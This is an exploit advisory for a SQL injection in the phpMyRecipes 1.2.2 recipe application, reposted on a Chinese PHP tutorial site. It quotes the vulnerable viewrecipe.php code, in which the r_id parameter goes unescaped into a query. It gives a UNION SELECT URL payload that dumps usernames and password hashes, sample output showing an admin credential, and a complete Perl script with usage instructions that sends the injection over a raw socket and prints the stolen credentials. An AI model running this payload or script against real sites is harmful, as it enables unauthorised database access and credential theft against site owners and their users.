来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 标题:phpMyRecipes 1.2.2 SQL Injection Exploit作者 cr4wl3r http://bastardlabs.info下载地址 http://sourceforge.net/projects/php-myrecipes/files/演示: http://bastardlabs.info/demo/phpMyRecip......
|
标题:phpMyRecipes 1.2.2 SQL Injection Exploit
作者 cr4wl3r http://bastardlabs.info
下载地址 http://sourceforge.net/projects/php-myrecipes/files/
演示: http://bastardlabs.info/demo/phpMyRecipes.png
测试系统: Ubuntu Linux
漏洞页面: viewrecipe.php
#
# $r_id = $_GET['r_id'];
#
# if (! ($result = mysql_query("SELECT
# name,category,servings,ingredients,instructions,description,creator,editor,imagefile FROM recipes WHERE id=$r_id"))) {
# dberror("viewrecipe.php", "Cannot select recipe");
# }
#
# http://www.2cto.com /[path]/recipes/viewrecipe.php?r_id=[SQLi]
#示例: http://bastardlabs/[path]/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users
#
#
# $ perl recipes.pl localhost /demo/
# [+] Please Wait ...
#
# [+] Getting Username and Password [ ok ]
# [+] w00tw00t
# [+] Username | Password --> admin:mps4BNRRjh3po
#!/usr/bin/perl
use IO::Socket;
$host = $ARGV[0];
$path = $ARGV[1];
if (@ARGV < 2) {
print qq(
+---------------------------------------------+
| phpMyRecipes 1.2.2 SQL Injection Exploit |
| |
| coded & exploited by cr4wl3r |
| http://bastardlabs.info/ |
+---------------------------------------------+
-=[X]=-
+---------------------------------------
Usage :
perl $0 <host> <path>
ex : perl $0 127.0.0.1 /phpMyRecipes/
+---------------------------------------
);
}
$target = "http://".$host.$path."/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host",
PeerPort=>"80") || die "[-] Can't connect to Server [ failed ]\n";
print "[+] Please Wait ...\n";
print $sock "GET $target HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: BastardLabs\n";
print $sock "Host: $host\n";
print $sock "Connection: close\n\n";
sleep 2;
while ($answer = <$sock>) {
if ($answer =~ /<B>(.*?)<\/B>/) {
print "\n[+] Getting Username and Password [ ok ]\n";
sleep 1;
print "[+] w00tw00t\n";
print "[+] Username | Password --> $1\n";
exit();
}
}
print "[-] Exploit Failed !\n";
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
